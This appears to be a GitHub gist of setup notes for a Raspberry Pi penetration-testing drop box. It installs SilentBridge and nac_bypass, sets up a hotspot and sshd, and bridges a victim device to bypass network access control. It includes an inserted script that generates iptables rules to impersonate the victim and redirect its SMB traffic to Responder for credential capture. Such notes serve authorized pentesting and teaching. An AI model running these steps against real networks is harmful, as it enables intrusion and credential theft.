@l4rm4nd
Last active July 12, 2025 16:53
SilentBridge on Raspberry Pi 4 (kali-linux-2025.2-raspberry-pi-arm64.img)
# install dependencies for netifaces
sudo apt install python2-dev -y
# get python2 pip
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py
rm get-pip.py
# downgrade virtualenv to support python2.7 venvs
# see https://github.com/pypa/virtualenv/releases/tag/20.22.0 - drops python2.7 support
# call the Python 3 pip explicitly: get-pip.py may have placed a Python 2 "pip" first in PATH,
# and only pip3 understands --break-system-packages
python3 -m pip install virtualenv==20.21.1 --break-system-packages --ignore-installed
# clone silentbridge
git clone https://github.com/s0lst1c3/silentbridge && cd silentbridge
# create venv for python2.7
virtualenv -p $(which python2) venv2
source venv2/bin/activate
# install silentbridge dependencies
pip install scapy==2.4.3 --ignore-installed
pip install netifaces
pip install nanpy
# test run silentbridge
python2 ./silentbridge
l4rm4nd commented Jun 27, 2025

From https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/

Tip

We use the RPi4's wifi antenna to spawn a hotspot.
The RPi4 will have the IP address 192.168.200.1/32.
SSH password authentication will be allowed from this subnet range only. Otherwise, pubkey auth.

sudo apt-get install isc-dhcp-server
sudo apt-get install hostapd
sudo systemctl enable isc-dhcp-server
sudo systemctl unmask hostapd
sudo systemctl enable hostapd

Then sudo nano /etc/dhcp/dhcpd.conf and put:

default-lease-time 600;
max-lease-time 7200;
subnet 192.168.200.0 netmask 255.255.255.0 {
range 192.168.200.2 192.168.200.100;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.200.255;
}

Then sudo nano /etc/hostapd/hostapd.conf and put:

Caution

Change the wifi hotspot name and credentials!

Warning

If you have already configured wlan0, you have to remove that configuration first.
It may have been done manually or by the Raspberry Pi Imager software.

If so, run sudo rm /etc/netplan/50-cloud-init.yaml and delete the connection via nmtui.

interface=wlan0
driver=nl80211
ssid=raspkali_hotspot
hw_mode=g
channel=6
ieee80211n=1
ieee80211d=1
country_code=DE
wme_enabled=1
auth_algs=1
ignore_broadcast_ssid=0
macaddr_acl=0
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=Sup3rS3cr3tW1F1P@ss!

Then validate the interface name in /etc/default/isc-dhcp-server (sudo nano /etc/default/isc-dhcp-server):

INTERFACESv4="wlan0"

We must create a service for isc-dhcp-server to properly start during reboots:

sudo nano /etc/systemd/system/isc-dhcp-server.service

put this in:

[Unit]
Description=ISC DHCP Server
After=network-pre.target
Wants=network-pre.target
Requires=network-pre.target
Requires=sys-subsystem-net-devices-wlan0.device
After=sys-subsystem-net-devices-wlan0.device
After=hostapd.service

[Service]
ExecStart=/etc/init.d/isc-dhcp-server start
ExecStop=/etc/init.d/isc-dhcp-server stop
Type=forking
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Then:

sudo systemctl daemon-reload
sudo systemctl restart hostapd
sudo systemctl enable isc-dhcp-server
sudo systemctl restart isc-dhcp-server

Also configure SSH properly (sudo nano /etc/ssh/sshd_config) as follows:

Tip

Make use of AllowUsers or AllowGroups!

Protocol 2
AddressFamily any
Port 22
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server

# no DSA host key: ssh-dss is not in the HostKeyAlgorithms list below, and recent OpenSSH releases have dropped DSA
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key

# SSH Authentication
UsePAM yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
#PermitRootLogin no
HostbasedAuthentication no
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no
IgnoreRhosts yes

# SSH Authorized Keyfiles
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2

# SSH Session
TCPKeepAlive yes
ClientAliveInterval 600
ClientAliveCountMax 2
LoginGraceTime 60
MaxAuthTries 3
Compression no

# SSH Information Disclosure
DebianBanner no
PrintMotd no
PrintLastLog yes

# SSH Logging
LogLevel VERBOSE
SyslogFacility AUTH

# SSH Tunneling & Forwarding
AllowAgentForwarding no
AllowTcpForwarding yes
PermitTunnel yes
X11Forwarding no
PermitUserEnvironment no

# SSH File Mode & Ownership Checking
StrictModes yes
#UsePrivilegeSeparation yes # deprecated

# SSH Access Controls - Groups
#AllowGroups ssh
#AllowUsers ssh-user

# SSH Encryption Ciphers
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr,aes192-ctr

# SSH Message Authentication Codes (MAC)
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
MACs hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com

# SSH Host Key Algorithms
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
HostKeyAlgorithms ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-512,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com

# SSH Key Exchange Algorithms
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512

# Allow older public key types
#PubkeyAcceptedKeyTypes=+ssh-rsa

# SSH Custom Network Configuration (Internal)
Match Address 192.168.200.0/24
    PasswordAuthentication yes
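
The Match block is the only thing separating "password login from the hotspot" from "password login from the wire", so it is worth checking what a given client address really ends up with before trusting the file. The following is an added example, not code from the gist or the linked post: it implements sshd's Match evaluation in shell for Address criteria only (global section first, a matching Match block overrides it, first matching block wins), runs it over a trimmed copy of the sshd_config above (constructed input), and checks for the AllowUsers/AllowGroups line the Tip asks for.

```shell
#!/usr/bin/env bash
# Added example, not part of the gist: work out which value a given client address
# really gets from an sshd_config that mixes global settings with "Match Address" blocks.
# sshd rules: in the global section the first value of a keyword wins; a matching Match
# block overrides it, and among several matching blocks the first one wins.
# Supported criteria: "Match All" and "Match Address <cidr,cidr,...>"; anything else aborts.
set -u

ip2int() {                      # dotted quad -> unsigned integer
  local IFS=.
  set -- $1
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

cidr_match() {                  # cidr_match <cidr-or-ip> <ip>; true when ip lies in cidr
  local net=${1%/*} bits=${1#*/} ip=$2 mask
  [ "$bits" = "$1" ] && bits=32                       # bare address means /32
  mask=$(( bits == 0 ? 0 : (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
  [ $(( $(ip2int "$net") & mask )) -eq $(( $(ip2int "$ip") & mask )) ]
}

addr_in_list() {                # addr_in_list <ip> <cidr,cidr,...>
  local ip=$1 cidr
  local IFS=,
  for cidr in $2; do
    case $cidr in '!'*) echo "negated Address entries are not handled: $cidr" >&2; exit 2 ;; esac
    cidr_match "$cidr" "$ip" && return 0
  done
  return 1
}

match_hits() {                  # match_hits <ip> <criteria...>; every criterion on the line must hold
  local ip=$1 crit; shift
  while [ $# -gt 0 ]; do
    crit=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case $crit in
      all)     shift ;;
      address) [ $# -ge 2 ] && addr_in_list "$ip" "$2" || return 1; shift 2 ;;
      *)       echo "unsupported Match criterion: $1" >&2; exit 2 ;;
    esac
  done
  return 0
}

effective_option() {            # effective_option <sshd_config> <keyword> <client_ip>
  local cfg=$1 want ip=$3 k v key global='' matched='' in_match=0 active=0
  want=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
  while read -r k v || [ -n "$k" ]; do
    case $k in ''|'#'*) continue ;; esac            # blank lines and comments
    key=$(printf '%s' "$k" | tr 'A-Z' 'a-z')
    if [ "$key" = match ]; then
      in_match=1; active=0
      # shellcheck disable=SC2086  (the criteria are meant to be word-split)
      if match_hits "$ip" $v; then active=1; fi
    elif [ "$in_match" -eq 0 ]; then
      if [ "$key" = "$want" ] && [ -z "$global" ]; then global=$v; fi
    elif [ "$active" -eq 1 ] && [ "$key" = "$want" ] && [ -z "$matched" ]; then
      matched=$v
    fi
  done < "$cfg"
  printf '%s\n' "${matched:-$global}"
}

access_list_set() {             # true when an uncommented AllowUsers/AllowGroups line exists
  grep -Eiq '^[[:space:]]*Allow(Users|Groups)[[:space:]]+[^[:space:]]' "$1"
}

# constructed input: a trimmed copy of the sshd_config posted above
SAMPLE_CFG=$(mktemp)
trap 'rm -f "$SAMPLE_CFG"' EXIT
cat > "$SAMPLE_CFG" <<'EOF'
UsePAM yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
#AllowGroups ssh
#AllowUsers ssh-user

Match Address 192.168.200.0/24
    PasswordAuthentication yes
EOF

for client in 192.168.200.5 10.0.0.5; do
  printf '%-14s PasswordAuthentication=%s\n' "$client" \
    "$(effective_option "$SAMPLE_CFG" PasswordAuthentication "$client")"
done
access_list_set "$SAMPLE_CFG" || echo "warning: no AllowUsers/AllowGroups line is active"
```

On the Pi itself the authoritative answer comes from sshd's own evaluator, for example sudo sshd -T -C addr=192.168.200.5,user=kali,host=client | grep -i passwordauthentication, which also validates the whole file; the script above is for reasoning about the file offline and catching the commented-out access list before the box goes on site.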

l4rm4nd commented Jun 27, 2025

From https://github.com/scipag/nac_bypass

# install dependencies
# not needed if you run kali linux
sudo apt-get install -y bridge-utils ethtool macchanger arptables ebtables iptables net-tools tcpdump

# load kernel module
sudo modprobe br_netfilter
# verify its loaded
lsmod | grep br_netfilter

# append to kernel modules
echo br_netfilter | sudo tee -a /etc/modules

# enable ipforwarding
sudo nano /etc/sysctl.conf

# and uncomment/put this line with no hashtag
# net.ipv4.ip_forward = 1

# clone repo
cd
git clone https://github.com/scipag/nac_bypass && cd nac_bypass

# test run
sudo su
chmod +x nac_bypass_setup.sh
./nac_bypass_setup.sh -h

The actual NAC bypass looks like this:

  1. Connect the switch to eth0 (native LAN interface of RPi4)
  2. Connect victim (e.g. printer) to eth1 (external USB LAN adapter)
  3. Then start the nac bypass:
# by default it will treat the lower interface device as switch side, and the next one as victim
./nac_bypass_setup.sh -1 eth0 -2 eth1

# script will ask to wait some time, so it is able to dump the needed info from the network traffic
# afterwards, you can proceed and for instance do an nmap scan on the network

Warning

As for Responder: Things got a little confusing for me at first.

You can look up the iptables rules like so to see what is going on: iptables -t nat -L

The nac bypass script will put rules in place that reroute all traffic intended for the client, let's say port 445, to your bridge. So Responder needs to be set up to listen on the bridge interface, but change the answering IP address to the one of the victim:

./Responder.py -I br0 -e victim.ip
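
To make the rerouting concrete, here is an added example (illustrative, not the scipag script's own rule set) that generates the NAT rules as a dry run: SNAT so that anything the bridge itself sends leaves as the victim, and DNAT so that connections to the victim's port 445 land on the bridge's own stack, where Responder is listening. The bridge address 169.254.66.66, the victim 10.1.1.50 and the source-port window 61000-62000 are assumed values, and the MAC/ARP rewriting (ebtables/arptables) that the real script also performs is left out.

```shell
#!/usr/bin/env bash
# Added example, not the scipag script's own rule set: the iptables NAT plumbing that lets a
# transparent bridge talk, and get talked to, under the victim's address. Everything is
# generated as a dry run (DRY_RUN=1, the default) so the rules can be reviewed; DRY_RUN=0
# executes them and needs root plus an existing bridge with br_netfilter loaded. Assumed
# values throughout: bridge br0 holding 169.254.66.66, victim 10.1.1.50, TCP 445/80 hijacked.
# MAC/ARP rewriting (ebtables/arptables), which the real script also does, is left out.
set -u
DRY_RUN=${DRY_RUN:-1}

run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

bridge_egress_rules() {   # bridge_egress_rules <bridge_if> <bridge_ip> <victim_ip> <lo_port> <hi_port>
  # traffic the bridge itself originates (nmap, Responder's own connections) leaves as the
  # victim, squeezed into a high source-port window so conntrack maps the replies back to
  # the bridge without colliding with the victim's own sessions
  local br=$1 brip=$2 vip=$3 lo=$4 hi=$5
  run iptables -t nat -A POSTROUTING -o "$br" -s "$brip" -p tcp -j SNAT --to-source "$vip:$lo-$hi"
  run iptables -t nat -A POSTROUTING -o "$br" -s "$brip" -p udp -j SNAT --to-source "$vip:$lo-$hi"
  run iptables -t nat -A POSTROUTING -o "$br" -s "$brip" -p icmp -j SNAT --to-source "$vip"
}

hijack_ports() {          # hijack_ports <bridge_if> <bridge_ip> <victim_ip> <tcp_port>...
  # connections the network opens to the victim's service are redirected to the bridge's
  # own stack; that is why Responder must bind to the bridge interface and still announce
  # the victim's address (-e) in its poisoned answers
  local br=$1 brip=$2 vip=$3 p
  shift 3
  for p in "$@"; do
    run iptables -t nat -A PREROUTING -i "$br" -d "$vip" -p tcp --dport "$p" -j DNAT --to-destination "$brip:$p"
  done
}

responder_cmd() {         # responder_cmd <bridge_if> <victim_ip>
  printf 'Responder.py -I %s -e %s\n' "$1" "$2"
}

# dry-run walk-through with the assumed addresses
bridge_egress_rules br0 169.254.66.66 10.1.1.50 61000 62000
hijack_ports br0 169.254.66.66 10.1.1.50 445 80
responder_cmd br0 10.1.1.50
```

After the rules are applied for real, iptables -t nat -S prints them in exactly this one-line form, which is easier to read than iptables -t nat -L when checking which victim ports have been pulled onto the bridge.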
